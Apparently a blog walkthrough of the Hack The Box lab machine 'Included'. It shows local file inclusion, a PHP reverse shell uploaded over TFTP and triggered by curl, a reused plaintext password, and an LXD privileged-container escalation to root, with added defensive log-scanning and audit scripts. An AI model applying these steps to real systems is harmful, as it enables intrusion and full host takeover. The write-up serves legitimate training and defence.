Included has been Pwned!

This image shows the Hack The Box machine Included

OK, it’s time to hack another machine from the Hack The Box Starting Point series. We have already managed to hack Archetype, Oopsie, Vaccine, Shield and Pathfinder. Today we are looking at the Included machine. This was a really fun box despite a frustrating ending. This box is fairly simple to start off with, provided you notice everything that is going on.


So first of all we ping the box to see if it’s up.

└──╼ [★]$ sudo ping | tee -a ping.txt
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=21.5 ms

Next we run our nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- | tee -a nmap.
Starting Nmap 7.91 ( ) at 2021-09-11 16:30 BST
Nmap scan report for
Host is up (0.022s latency).
Not shown: 65535 closed ports
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn’t have a title (text/html; charset=UTF-8).
|_Requested resource was
No exact OS matches for host (If you know what OS is running on it, see ).

Ok, so only a webserver is running, or is it? I went to poke at the website and immediately saw that it was calling index.php using a file parameter. That caught my eye because it seemed like quite an obvious naming convention for accessing files. So naturally I pointed it straight at the /etc/passwd file and immediately had the file returned to me.

This is an image of the titan gears website that we are trying to hack.
Hack The Box Included File Inclusion
This is an image showing local file inclusion hack on the titan gears website.
Hack The Box Included /etc/passwd

Sweet, where now? Well, as other guides have mentioned, there is an interesting user in the /etc/passwd file. As you can see from the tool output below, the user tftp exists at the very bottom of the file with the home directory of /var/lib/tftpboot.

cat /mnt/root/etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

Interesting. I confirmed that TFTP was open; it listens on UDP rather than TCP, which is why our Nmap scan missed it. At this point I would also like to point out that Nessus missed the TFTP service too. It also missed the directory traversal vulnerability, which I felt was odd since I asked it to scan for web vulnerabilities. Nikto also missed the directory traversal vulnerability, so this is an important lesson that you can’t always rely on tools.
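The scanners missed the traversal, but requests like the ones above are plain to see in the web server's access log. As an added example (not part of the original post), this sketch flags file= values that resolve outside the web root or into the TFTP directory; the log lines are constructed, and the web root path and request layout are assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

WEB_ROOT = "/var/www/html"       # assumption: Apache default docroot on Ubuntu
TFTP_ROOT = "/var/lib/tftpboot"  # tftp home directory from the passwd listing

# Constructed access-log lines (combined log format), not taken from the target.
SAMPLE_LOG = """\
10.10.14.2 - - [11/Sep/2021:16:35:01 +0100] "GET /?file=index.php HTTP/1.1" 200 3704 "-" "Mozilla/5.0"
10.10.14.2 - - [11/Sep/2021:16:36:12 +0100] "GET /?file=/etc/passwd HTTP/1.1" 200 1575 "-" "Mozilla/5.0"
10.10.14.2 - - [11/Sep/2021:16:37:40 +0100] "GET /?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1575 "-" "curl/7.74.0"
10.10.14.2 - - [11/Sep/2021:16:52:03 +0100] "GET /?file=/var/lib/tftpboot/phpshell.php HTTP/1.1" 200 0 "-" "curl/7.74.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(value):
    """Return None for a benign value, else a reason string."""
    # Resolve the value the way a relative include would: against the web root.
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, value))
    if resolved == TFTP_ROOT or resolved.startswith(TFTP_ROOT + "/"):
        return "include from TFTP upload directory"
    if resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/"):
        return "path outside web root"
    return None

def scan(log_text):
    """Return (client, status, value, reason) for every suspicious file= value."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        # parse_qs percent-decodes, so ..%2f is evaluated as ../
        for value in parse_qs(urlsplit(target).query).get("file", []):
            reason = classify(value)
            if reason:
                findings.append((client, status, value, reason))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```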

This image shows Nessus scan results which doesn't really show that there is anything to hack.
Hack The Box Nessus Output

Foothold Hack

Anyway I’m getting side tracked. I pinched the tried and tested pentestmonkey/php-reverse-shell and configured it for my IP address and port. I then uploaded the file to the machine using tftp.

└──╼ [★]$ tftp
tftp> put phpshell.php phpshell.php
Sent 5681 bytes in 0.4 seconds

Once that was uploaded to the server I created my netcat listener and then ran curl against the URL to get a shell.

└──╼ [★]$ curl

I checked out the history and ran a few other tools, but found nothing of much interest. Listing the /home directory showed a user called mike. I guess this is the user we need to escalate to in order to proceed further. It looks like mike has the user.txt flag in his home directory too, so this confirmed my suspicions. After failing for a while I decided to try to switch user to mike using the password found on the previous machine, Pathfinder. Yeah, it worked.

bash-4.4$ ls /home/mike
ls /home/mike
alpine-v3.14-x86_64-20210909_2211.tar.gz user.txt
bash-4.4$ cat /home/mike/user.txt
cat: /home/mike/user.txt: Permission denied
bash-4.4$ su mike
su mike
Password: Sheffield19

With that I was able to capture the user flag.

bash-4.4$ cat /home/mike/user.txt
cat /home/mike/user.txt

So what next? Well, it was time to perform some more enumeration on the machine. I grabbed a copy of Linpeas and hosted it on my machine using Python’s simple HTTP server. I then downloaded the script and ran it. Unfortunately, my VM crashed before I had a chance to save the output, but it turns out mike is a member of the lxd group.

At this point I checked the official walkthrough and attempted to follow the instructions. However for whatever reason I couldn’t get the lxd-alpine-builder script to work at all. Every time I ran the script, I just kept getting an error message telling me there was an invalid parameter. I tried to strace the script but the information it provided wasn’t much help either.

Privilege Escalation Hack

After a bit of google fu I found this awesome article by that essentially does the same thing but differently. So, I got to following the instructions there and created the image.

sudo su
sudo apt update
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
sudo go get -d -v
cd $HOME/go/src/
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

With the image and the rootfs.squashfs file ready, I started the python server again and downloaded the files from my local machine to the Included machine.

mike@included:~$ wget
2021-09-11 18:02:14 --
Connecting to... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2318336 (2.2M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’
rootfs.squashfs 100%[===================>] 2.21M 3.17MB/s in
mike@included:~$ wget
2021-09-11 18:03:40 --
Connecting to... connected.
HTTP request sent, awaiting response... 200 OK
Length: 884 [application/x-xz]
Saving to: ‘lxd.tar.xz’
lxd.tar.xz 100%[===================>] 884 --.-KB/s in 0.005s

With the files now on the machine, I imported the image, configured it and ran it.

mike@included:~$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
mike@included:~$ lxc init alpine privesc -c security.privileged=true
lxc init alpine privesc -c security.privileged=true
Creating privesc
mike@included:~$ lxc list
lxc list
+---------+---------+------+------+------------+-----------+
+---------+---------+------+------+------------+-----------+
| privesc | STOPPED |      |      | PERSISTENT | 0         |
+---------+---------+------+------+------------+-----------+
mike@included:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
<st-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
mike@included:~$ lxc start privesc
lxc start privesc
mike@included:~$ lxc exec privesc /bin/sh
lxc exec privesc /bin/sh

While the shell wasn’t pretty, it did have root access and I was able to capture the final flag.

cd /mnt/root/root
/mnt/root/root # ^[[43;18Rcat root.txt
cat root.txt
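What made this escalation possible is lxd group membership combined with a privileged container that has the host filesystem attached. As an added example (not from the original post), this audit flags both conditions; the sample inputs are constructed, the sensitive-path list is a hypothetical policy, and the JSON field names are assumed to match the output of lxc list --format json.

```python
import json
import posixpath

# Constructed inputs: an /etc/group excerpt and `lxc list --format json` output.
# The JSON field names (name, config, devices, expanded_*) are an assumption.
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:\nlxd:x:108:mike\nmike:x:1000:\n"
SAMPLE_INSTANCES = json.dumps([
    {"name": "privesc", "config": {"security.privileged": "true"},
     "devices": {"host-root": {"type": "disk", "source": "/",
                               "path": "/mnt/root", "recursive": "true"}}},
    {"name": "web", "config": {},
     "devices": {"root": {"type": "disk", "path": "/", "pool": "default"},
                 "data": {"type": "disk", "source": "/srv/web-data", "path": "/data"}}},
])

# Host paths that should never be handed to a container (hypothetical policy list).
SENSITIVE_SOURCES = {"/", "/etc", "/root", "/home", "/var"}

def lxd_group_members(group_text):
    """Users in the lxd group can drive the LXD daemon, which runs as root."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "lxd":
            return [user for user in fields[3].split(",") if user]
    return []

def risky_instances(instances_json):
    """Flag privileged instances and disk devices that expose sensitive host paths."""
    findings = []
    for inst in json.loads(instances_json):
        # expanded_* also carries settings inherited from profiles, when present.
        config = inst.get("expanded_config") or inst.get("config") or {}
        devices = inst.get("expanded_devices") or inst.get("devices") or {}
        privileged = config.get("security.privileged") == "true"
        mounts = []
        for dev in devices.values():
            source = dev.get("source")  # pool-backed root disks have no source
            if dev.get("type") == "disk" and source:
                if posixpath.normpath(source) in SENSITIVE_SOURCES:
                    mounts.append(source)
        if privileged or mounts:
            findings.append({"name": inst["name"], "privileged": privileged,
                             "host_mounts": sorted(mounts)})
    return findings

if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    for finding in risky_instances(SAMPLE_INSTANCES):
        print(finding)
```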
This image shows the included machine that we were trying to hack being pwned!
Hack The Box Included Has Been Pwned!